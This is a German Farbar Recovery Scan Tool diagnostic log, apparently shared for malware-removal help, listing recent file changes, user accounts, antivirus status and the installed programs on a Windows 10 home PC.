2022-07-14 18:50 - 2020-11-19 01:34 - 000000000 ____D C:\Windows\system32\Drivers\wd
2022-07-14 18:50 - 2019-12-07 11:03 - 000032768 _____ C:\Windows\system32\config\ELAM
2022-07-14 18:27 - 2021-04-19 21:21 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Avira
2022-07-14 17:49 - 2020-11-19 01:36 - 003010560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PrintConfig.dll
2022-07-14 17:44 - 2020-12-10 18:36 - 000000000 ____D C:\Windows\system32\MRT
2022-07-14 17:42 - 2020-12-10 18:36 - 146546848 ____C (Microsoft Corporation) C:\Windows\system32\MRT.exe
2022-07-14 11:46 - 2022-03-02 17:27 - 000000000 ____D C:\Program Files\Oculus
2022-07-14 11:45 - 2020-11-19 01:36 - 000003756 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-07-14 11:45 - 2020-11-19 01:36 - 000003632 _____ C:\Windows\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-07-13 18:13 - 2019-12-07 11:14 - 000000000 ____D C:\Windows\LiveKernelReports
2022-07-12 20:27 - 2020-12-16 21:04 - 000000000 ____D C:\Users\chris\AppData\Local\CrashDumps
2022-07-12 17:40 - 2021-12-12 18:38 - 000003584 _____ C:\Windows\system32\Tasks\OneDrive Reporting Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:34 - 000003376 _____ C:\Windows\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-292222086-413629167-3624375346-1001
2022-07-12 17:40 - 2020-12-10 18:31 - 000002395 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-07-07 18:59 - 2021-01-05 14:23 - 000004464 _____ C:\Windows\system32\Tasks\Opera scheduled assistant Autoupdate 1609849435
2022-07-07 07:12 - 2020-12-10 18:52 - 000002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2022-07-05 19:31 - 2020-12-10 21:55 - 000000000 ____D C:\ProgramData\boost_interprocess
2022-07-04 16:51 - 2020-12-14 13:53 - 000000000 ____D C:\ProgramData\CanonIJPLM
2022-07-03 19:36 - 2022-05-24 22:29 - 000000000 ____D C:\Users\chris\AppData\Roaming\RenPy
2022-07-01 21:42 - 2020-12-10 19:56 - 000000000 ____D C:\ProgramData\Avira
2022-07-01 21:42 - 2019-12-07 11:14 - 000000000 ___HD C:\Windows\ELAMBKUP
2022-07-01 21:41 - 2021-01-05 14:22 - 000000000 ____D C:\Program Files (x86)\Avira
2022-07-01 21:31 - 2020-12-10 18:37 - 000803176 _____ (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2022-06-29 20:27 - 2022-06-17 20:37 - 000000000 ____D C:\Users\chris\AppData\Roaming\dryad_quest
2022-06-26 17:17 - 2021-03-06 15:41 - 000000000 ____D C:\Users\chris\Documents\My Games
2022-06-26 16:50 - 2020-12-10 20:02 - 000000000 ____D C:\Users\chris\AppData\Local\D3DSCache
2022-06-26 16:46 - 2021-03-05 14:55 - 000000000 ____D C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2022-06-26 16:43 - 2020-12-10 22:11 - 000000000 ____D C:\ProgramData\Riot Games
2022-06-26 10:01 - 2020-11-19 01:38 - 000000000 ____D C:\ProgramData\Packages
2022-06-22 14:44 - 2022-02-01 11:45 - 000001423 _____ C:\Users\chris\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Grammarly.lnk
2022-06-22 14:44 - 2022-02-01 11:45 - 000001415 _____ C:\Users\chris\Desktop\Grammarly.lnk

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse ========

2022-06-08 21:06 - 2022-06-08 21:06 - 000008412 _____ () C:\Users\chris\AppData\Local\recently-used.xbel

==================== SigCheck ============================

(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)

==================== Ende von FRST.txt ========================
         

Code:
ATTFilter
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 18-07-2022
durchgeführt von chris (19-07-2022 12:30:10)
Gestartet von C:\Users\chris\Downloads
Microsoft Windows 10 Home Version 21H1 19043.1826 (X64) (2020-12-10 23:20:30)
Start-Modus: Normal
==========================================================


==================== Konten: =============================


(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

Administrator (S-1-5-21-292222086-413629167-3624375346-500 - Administrator - Disabled)
chris (S-1-5-21-292222086-413629167-3624375346-1001 - Administrator - Enabled) => C:\Users\chris
DefaultAccount (S-1-5-21-292222086-413629167-3624375346-503 - Limited - Disabled)
Gast (S-1-5-21-292222086-413629167-3624375346-501 - Limited - Disabled)
Lisa (S-1-5-21-292222086-413629167-3624375346-1006 - Limited - Enabled) => C:\Users\Lisa
WDAGUtilityAccount (S-1-5-21-292222086-413629167-3624375346-504 - Limited - Disabled)

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Avira Security (Enabled - Up to date) {76C0BF9F-9FD3-D249-DE2F-7A33A59B9258}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

3DMark (HKLM\...\{63FED867-23CB-4AC7-9F22-64AD80FA0DA7}) (Version: 2.16.7117.0 - UL) Hidden
3DMark (HKLM-x32\...\{b6a95974-3bca-4571-9656-98b7350cb823}) (Version: 2.16.7113.0 - UL)
AMD Chipset Software (HKLM-x32\...\AMD_Chipset_IODrivers) (Version: 2.09.28.509 - Advanced Micro Devices, Inc.)
AMD GPIO2 Driver (HKLM-x32\...\{E9DD399F-21A3-479E-A7DF-D6CF4B2ADBF3}) (Version: 2.2.0.130 - Advanced Micro Devices, Inc.) Hidden
AMD PCI Driver (HKLM-x32\...\{80EC3CEE-2940-42A1-A776-B5D810D39F1E}) (Version: 1.0.0.80 - Advanced Micro Devices, Inc.) Hidden
AMD PSP Driver (HKLM-x32\...\{988F14B8-79A8-475D-BAC7-83F96AD3D821}) (Version: 4.13.0.0 - Advanced Micro Devices, Inc.) Hidden
AMD Ryzen Balanced Driver (HKLM-x32\...\{A171D320-C42C-4F3B-A2D8-C6A09F6788CC}) (Version: 6.0.0.7 - Advanced Micro Devices, Inc.) Hidden
AMD SBxxx SMBus Driver Alpha (HKLM-x32\...\{AAE0E27D-C88A-49BA-8715-77ADCD4286A3}) (Version: 5.12.0.38 - Advanced Micro Devices, Inc.) Hidden
AMD_Chipset_Drivers (HKLM-x32\...\{ad7f5f31-0d6f-40f2-83b1-5556e0d0f9b1}) (Version: 2.09.28.509 - Advanced Micro Devices, Inc.) Hidden
Anaconda3 2020.07 (Python 3.8.3 64-bit) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Anaconda3 2020.07 (Python 3.8.3 64-bit)) (Version: 2020.07 - Anaconda, Inc.)
Anaconda3 2020.11 (Python 3.8.5 64-bit) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Anaconda3 2020.11 (Python 3.8.5 64-bit)) (Version: 2020.11 - Anaconda, Inc.)
Asus ProductDaemonSetup (HKLM\...\{36606417-B1C4-42C2-B5C1-67972DA63DAB}) (Version: 3.6.4501 - ASUSTeK COMPUTER INC) Hidden
Asus Sonic Radar 3 (HKLM-x32\...\{f302c1fc-67c2-40b1-93c7-266d93310a2d}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC)
Asus Sonic Studio 3 (HKLM-x32\...\{44d9a0cd-0414-49c0-8488-dc0849f46bd1}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC)
Asus SonicRadar3Setup (HKLM\...\{09AE428F-CB54-42C8-8342-D0EC6E4136D0}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC) Hidden
Asus SonicStudio3Setup (HKLM\...\{ACA23ED7-018F-47AE-8C9C-2096E1455DA4}) (Version: 3.6.45.60920 - ASUSTeK COMPUTER INC) Hidden
Avira Phantom VPN (HKLM-x32\...\Avira Phantom VPN) (Version: 2.41.1.25731 - Avira Operations GmbH & Co. KG) Hidden
Avira Security (HKLM-x32\...\Avira Security_is1) (Version: 1.1.69.30057 - Avira Operations GmbH & Co. KG) Hidden
Avira Security (HKLM-x32\...\AviraSecurityUninstaller) (Version:  - Avira Operations GmbH & Co. KG)
Avira System Speedup (HKLM-x32\...\Avira System Speedup_is1) (Version: 6.19.0.11413 - Avira Operations GmbH & Co. KG) Hidden
Breitbandmessung 2.0.4 (HKLM\...\14607473-30db-509f-94f0-bb7c085c619e) (Version: 2.0.4 - zafaco GmbH)
Canon Easy-WebPrint EX (HKLM-x32\...\Easy-WebPrint EX) (Version: 1.7.0.0 - Canon Inc.)
Canon IJ Network Scanner Selector EX2 (HKLM-x32\...\Canon_IJ_Network_Scanner_Selector_EX2) (Version: 2.0.5.3 - Canon Inc.)
Canon IJ Printer Assistant Tool (HKLM-x32\...\Canon IJ Printer Assistant Tool) (Version: 1.55.2.31 - Canon Inc.)
Canon IJ Scan Utility (HKLM-x32\...\Canon_IJ_Scan_Utility) (Version: 1.4.0.16 - Canon Inc.)
Canon Inkjet Printer/Scanner/Fax Extended Survey Program (HKLM-x32\...\CANONIJPLM100) (Version: 6.4.0 - Canon Inc.)
Canon My Image Garden (HKLM-x32\...\Canon My Image Garden) (Version: 3.6.4 - Canon Inc.)
Canon My Image Garden Design Files (HKLM-x32\...\Canon My Image Garden Design Files) (Version: 3.6.0 - Canon Inc.)
Canon Quick Menu (HKLM-x32\...\CanonQuickMenu) (Version: 2.8.5 - Canon Inc.)
Canon TS3100 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_TS3100_series) (Version: 1.01 - Canon Inc.)
Canon TS3100 series On-Screen-Handbuch (HKLM-x32\...\Canon TS3100 series On-Screen-Handbuch) (Version: 1.4.0 - Canon Inc.)
Discord (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Discord) (Version: 0.0.309 - Discord Inc.)
Discord (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Discord) (Version: 0.0.309 - Discord Inc.)
Druckerregistrierung (HKLM-x32\...\Canon EISRegistration) (Version: 1.7.0 - Canon Inc.)
Endpoint Protection SDK (HKLM\...\{68E1CCB4-4965-4713-BDEB-77F6D6C9BF9D}_is1) (Version: 1.0.2206.3019 - Avira Operations GmbH & Co. KG) Hidden
Epic Games Launcher (HKLM-x32\...\{07D9F8F3-EC99-4133-919D-DA341C62937C}) (Version: 1.1.298.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{F9C5C994-F6B9-4D75-B3E7-AD01B84073E9}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2.1 - )
Excel (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\1fc5b090eab9aa41f8a2f5987367e6da) (Version: 1.0 - Excel)
Far Cry 3 (HKLM-x32\...\Uplay Install 46) (Version:  - Ubisoft)
Futuremark SystemInfo (HKLM-x32\...\{F608ED5F-3818-4F87-A277-E52E8790C039}) (Version: 5.35.871.0 - Futuremark)
GaomonTablet (HKLM-x32\...\GaomonTablet) (Version: 1.1.1.1 - Gaomon)
GeoGebra Classic (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\GeoGebra_6) (Version: 6.0.620 - International GeoGebra Institute)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 103.0.5060.114 - Google LLC)
Grammarly for Windows (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Grammarly Desktop Integrations) (Version: 1.0.10.223 - )
IIS 10.0 Express (HKLM\...\{0307C98E-AE82-4A4F-A950-A72FBD805338}) (Version: 10.0.04403 - Microsoft Corporation)
IIS Express Application Compatibility Database for x64 (HKLM\...\{08274920-8908-45c2-9258-8ad67ff77b09}.sdb) (Version:  - ) Hidden
IIS Express Application Compatibility Database for x86 (HKLM\...\{ad846bae-d44b-4722-abad-f7420e08bcd9}.sdb) (Version:  - ) Hidden
Inkscape (HKLM\...\{776C087E-B714-4153-9414-79592EC61B4A}) (Version: 1.0.1 - Inkscape)
Launcher Prerequisites (x64) (HKLM-x32\...\{43a03b9c-4770-409c-a999-587b60700b63}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Riot Game league_of_legends.live) (Version:  - Riot Games, Inc)
MATLAB R2020b (HKLM\...\Matlab R2020b) (Version: 9.9 - MathWorks)
Microsoft .NET Framework 4.8 SDK (HKLM-x32\...\{949C0535-171C-480F-9CF4-D25C9E60FE88}) (Version: 4.8.03928 - Microsoft Corporation) Hidden
Microsoft .NET Host - 5.0.17 (x64) (HKLM\...\{E663ED1E-899C-40E8-91D0-8D37B95E3C69}) (Version: 40.68.31213 - Microsoft Corporation) Hidden
Microsoft .NET Host FX Resolver - 5.0.17 (x64) (HKLM\...\{8BA25391-0BE6-443A-8EBF-86A29BAFC479}) (Version: 40.68.31213 - Microsoft Corporation) Hidden
Microsoft .NET Runtime - 5.0.17 (x64) (HKLM\...\{5A66E598-37BD-4C8A-A7CB-A71C32ABCD78}) (Version: 40.68.31213 - Microsoft Corporation) Hidden
Microsoft Edge (HKLM-x32\...\Microsoft Edge) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft Edge WebView2-Laufzeit (HKLM-x32\...\Microsoft EdgeWebView) (Version: 103.0.1264.62 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\OneDriveSetup.exe) (Version: 22.131.0619.0001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\OneDriveSetup.exe) (Version: 21.196.0921.0007 - Microsoft Corporation)
Microsoft SQL Server 2016 LocalDB  (HKLM\...\{33B8D051-4DF5-4103-8FDB-8663E468A204}) (Version: 13.1.4001.0 - Microsoft Corporation)
Microsoft Teams (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Teams) (Version: 1.4.00.11161 - Microsoft Corporation)
Microsoft Update Health Tools (HKLM\...\{7B1FCD52-8F6B-4F12-A143-361EA39F5E7C}) (Version: 3.67.0.0 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030 (HKLM\...\{37B8F9C7-03FB-3253-8781-2517C99D7C00}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030 (HKLM\...\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030 (HKLM-x32\...\{B175520C-86A2-35A7-8619-86DC379688B9}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030 (HKLM-x32\...\{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}) (Version: 11.0.61030 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 x64 Additional Runtime - 12.0.21005 (HKLM\...\{929FBD26-9020-399B-9A7A-751D61F0B942}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x64 Minimum Runtime - 12.0.21005 (HKLM\...\{A749D8E6-B613-3BE3-8F5F-045C84EBA29B}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (HKLM-x32\...\{F8CFEB22-A2E7-3971-9EDA-4B11EDEFC185}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (HKLM-x32\...\{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}) (Version: 12.0.21005 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29334 (HKLM-x32\...\{a9cfe9c7-e54f-46cd-9c5c-542ff8e3e8c4}) (Version: 14.28.29334.0 - Microsoft Corporation)
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29914 (HKLM-x32\...\{1b5476d9-ab8e-4b0d-b004-059a1bd5568b}) (Version: 14.28.29914.0 - Microsoft Corporation)
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29334 (HKLM\...\{2E11EF4E-901F-4B2D-B68E-3DB2A566C857}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29334 (HKLM\...\{8A3F7D5B-422D-49D9-84F7-8DC1B7782967}) (Version: 14.28.29334 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29914 (HKLM-x32\...\{BD8C6100-7C7D-48DD-93BA-69F6828213FE}) (Version: 14.28.29914 - Microsoft Corporation) Hidden
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29914 (HKLM-x32\...\{42365A3A-622A-4EED-A727-FE192A794AFD}) (Version: 14.28.29914 - Microsoft Corporation) Hidden
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\{9495AEB4-AB97-39DE-8C42-806EEF75ECA7}) (Version: 10.0.50908 - Microsoft Corporation) Hidden
Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)
Microsoft Visual Studio Code (User) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\{771FD6B0-FA20-440A-A002-3B3BAC16DC50}_is1) (Version: 1.55.2 - Microsoft Corporation)
Microsoft Web Deploy 4.0 (HKLM\...\{2EC26D34-FB67-4C58-AC20-235697551222}) (Version: 10.0.3802 - Microsoft Corporation)
Microsoft Windows Desktop Runtime - 5.0.17 (x64) (HKLM\...\{3C31CBA1-A0D9-4B95-A807-AD2313D12F47}) (Version: 40.68.31219 - Microsoft Corporation) Hidden
Microsoft Windows Desktop Runtime - 5.0.17 (x64) (HKLM-x32\...\{20d5df4e-006c-4d6d-a0dc-490d009b9786}) (Version: 5.0.17.31219 - Microsoft Corporation)
MiKTeX (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\MiKTeX) (Version: 20.11 - MiKTeX.org)
MNF Club (HKLM-x32\...\{E829E337-B9F9-422B-9D88-5EB8B1CC1A2A}) (Version: 1.03 - MNF Games Ltd)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 91.10.0 - Mozilla)
Mozilla Thunderbird (x64 de) (HKLM\...\Mozilla Thunderbird 91.10.0 (x64 de)) (Version: 91.10.0 - Mozilla)
Nefarius Virtual Gamepad Emulation Bus Driver (HKLM\...\{93D91F60-7C94-4A79-863F-EA713D2EB3F3}) (Version: 1.17.333.0 - Nefarius Software Solutions e.U.)
NordVPN (HKLM\...\{19465C24-3D5D-4327-B99F-3CC0A1D38151}_is1) (Version: 6.41.11.0 - TEFINCOM S.A.)
NordVPN network TAP (HKLM-x32\...\{97DEC5D6-2BE9-45BB-BFC5-274B851B486B}) (Version: 1.0.1 - NordVPN)
NordVPN network TUN (HKLM\...\{BD0E4F38-D3F6-452D-A32E-B14D721839AC}) (Version: 1.0.1 - NordVPN)
NVIDIA FrameView SDK 1.1.4923.29968894 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_FrameViewSdk) (Version: 1.1.4923.29968894 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.23.0.74 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.23.0.74 - NVIDIA Corporation)
NVIDIA Grafiktreiber 496.13 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 496.13 - NVIDIA Corporation)
NVIDIA HD-Audiotreiber 1.3.38.92 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.38.92 - NVIDIA Corporation)
NVIDIA PhysX-Systemsoftware 9.21.0713 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.21.0713 - NVIDIA Corporation)
OBS Studio (HKLM-x32\...\OBS Studio) (Version: 26.1.1 - OBS Project)
Oculus (HKLM\...\Oculus) (Version: <3 - Facebook Technologies, LLC)
OpenBoard (1.5.4.240) (HKLM-x32\...\{8CCA6AC7-BBF9-4DD2-8E70-A907E0FCA38F}}_is1) (Version: 1.5.4.240 - Open Education Foundation)
OpenConnect-GUI (HKLM-x32\...\OpenConnect-GUI) (Version: 1.5.3 - OpenConnect-GUI Team)
Opera GX Stable 79.0.4143.73 (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\Opera GX 79.0.4143.73) (Version: 79.0.4143.73 - Opera Software)
Opera GX Stable 88.0.4412.85 (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Opera GX 88.0.4412.85) (Version: 88.0.4412.85 - Opera Software)
Opera Stable 89.0.4447.48 (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\Opera 89.0.4447.48) (Version: 89.0.4447.48 - Opera Software)
PhotoStage Diashow-Programm (HKLM-x32\...\PhotoStage) (Version: 8.65 - NCH Software)
PowerPoint (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\319814cb56b667dff88f54e08be8f51f) (Version: 1.0 - PowerPoint)
Promontory_GPIO Driver (HKLM-x32\...\{B5512BCC-F4CD-4159-86A4-B2AD7D38FFA9}) (Version: 2.0.1.0 - Advanced Micro Devices, Inc.) Hidden
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
PyCharm Community Edition 2021.2 (HKLM-x32\...\PyCharm Community Edition 2021.2) (Version: 212.4746.96 - JetBrains s.r.o.)
Python 3.9.4 (64-bit) (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\{8a52f2bf-c3d0-4872-bc3d-61f6eab0cbf2}) (Version: 3.9.4150.0 - Python Software Foundation)
Python 3.9.4 Add to Path (64-bit) (HKLM\...\{B943A821-11D8-4FB4-B573-6D04DCC596AD}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Core Interpreter (64-bit) (HKLM\...\{1C17C2CE-B315-4C1C-885A-E37181C7368E}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Development Libraries (64-bit) (HKLM\...\{CB856DD1-55A4-42B3-B676-73DDE515A589}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Documentation (64-bit) (HKLM\...\{73524E2A-5D97-4CB8-8438-5FE8F9653F1C}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Executables (64-bit) (HKLM\...\{EDBB67F1-B275-4AC6-9D32-0A033570A705}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 pip Bootstrap (64-bit) (HKLM\...\{1FDC7BC3-4CE5-4236-A8C2-0C4A7AFFDFA4}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Standard Library (64-bit) (HKLM\...\{91ED5736-9D50-4991-87DC-CFB0492D1A22}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Tcl/Tk Support (64-bit) (HKLM\...\{4E0E4F08-ECD0-4737-ABFC-030B702AC2BF}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Test Suite (64-bit) (HKLM\...\{F12FD64B-8964-4F40-8448-7FA3955C5AD6}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python 3.9.4 Utility Scripts (64-bit) (HKLM\...\{BBCC595F-93C2-4054-9565-8F4F19B3D706}) (Version: 3.9.4150.0 - Python Software Foundation) Hidden
Python Launcher (HKLM-x32\...\{BDD80906-41E0-43DB-8C65-D8BCCEB3A3F8}) (Version: 3.9.7400.0 - Python Software Foundation)
Razer Synapse (HKLM-x32\...\Razer Synapse) (Version: 3.7.0228.022817 - Razer Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.8746.1 - Realtek Semiconductor Corp.)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TAP-Windows 9.21.2 (HKLM\...\TAP-Windows) (Version: 9.21.2 - )
TechPowerUp GPU-Z (HKLM-x32\...\{8B0F211E-5846-4FB2-B0B9-4EB31546FDF9}}_is1) (Version:  - TechPowerUp)
TeXstudio - TeXstudio is a fully featured LaTeX editor. (HKLM\...\TeXstudio) (Version: 3.1.1 - Benito van der Zander)
TeXstudio - TeXstudio is a fully featured LaTeX editor. (HKLM-x32\...\TeXstudio) (Version: 3.0.1 - Benito van der Zander)
Twitch (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\{DEE70742-F4E9-44CA-B2B9-EE95DCF37295}) (Version: 8.0.0 - Twitch Interactive, Inc.)
Ubisoft Connect (HKLM-x32\...\Uplay) (Version: 114.1 - Ubisoft)
Unity Hub 2.4.2 (HKLM\...\{Unity Technologies - Hub}) (Version: 2.4.2 - Unity Technologies Inc.)
Vulkan Run Time Libraries 1.0.65.1 (HKLM\...\VulkanRT1.0.65.1) (Version: 1.0.65.1 - LunarG, Inc.) Hidden
Windows SDK AddOn (HKLM-x32\...\{E6F877A1-2F65-4BF0-87B6-A4071B7663D3}) (Version: 10.1.0.0 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{4254C1AD-B9B0-4020-A4B1-D8B61D12142A}) (Version: 3.7.2204.15001 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{63EFBDB5-01B0-4614-BE9F-7F1908E42275}) (Version: 3.1.2109.29003 - Microsoft Corporation)
Windows-PC-Integritätsprüfung (HKLM\...\{B3956CF3-F6C5-4567-AC38-1FD4432B319C}) (Version: 3.6.2204.08001 - Microsoft Corporation)
Windows-Treiberpaket - Razer Inc. (WinUSB) USB  (05/04/2016 6.2.9200.16385) (HKLM\...\874D6B1A2BD2AE8FF3594AB704F2A4A3F8342FB5) (Version: 05/04/2016 6.2.9200.16385 - Razer Inc.)
WinRAR 6.00 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 6.00.0 - win.rar GmbH)
Word (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\1b837d0bf93d01407352736c91b7bf50) (Version: 1.0 - Word)
Workflow Manager Client 1.0 (HKLM\...\{831D3854-30D1-4A11-927C-8E94B8091949}) (Version: 2.1.10525.2 - Microsoft Corporation) Hidden
Zoom (HKU\S-1-5-21-292222086-413629167-3624375346-1001\...\ZoomUMX) (Version: 5.9.1 (2581) - Zoom Video Communications, Inc.)
Zoom (HKU\S-1-5-21-292222086-413629167-3624375346-1006\...\ZoomUMX) (Version: 5.5.4 (13142.0301) - Zoom Video Communications, Inc.)

Packages:
=========
ASUS Grid (Beta) -> C:\Program Files\WindowsApps\B9ECED6F.133F79A42C6_1.0.14.0_x64__qmba6cd70vzyy [2021-03-09] (ASUSTeK COMPUTER INC.)
Cool File Viewer -> C:\Program Files\WindowsApps\20815shootingapp.AirFileViewer_1.4.14.0_x86__xcg28tkrsnqww [2022-01-31] (Cool File Viewer)
Media Engine-Add-On für Fotos -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x64__8wekyb3d8bbwe [2021-01-19] (Microsoft Corporation)
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.13.7040.0_x64__8wekyb3d8bbwe [2022-07-10] (Microsoft Studios) [MS Ad]
Microsoft Whiteboard -> C:\Program Files\WindowsApps\Microsoft.Whiteboard_52.10620.425.0_x64__8wekyb3d8bbwe [2022-07-07] (Microsoft Corporation)
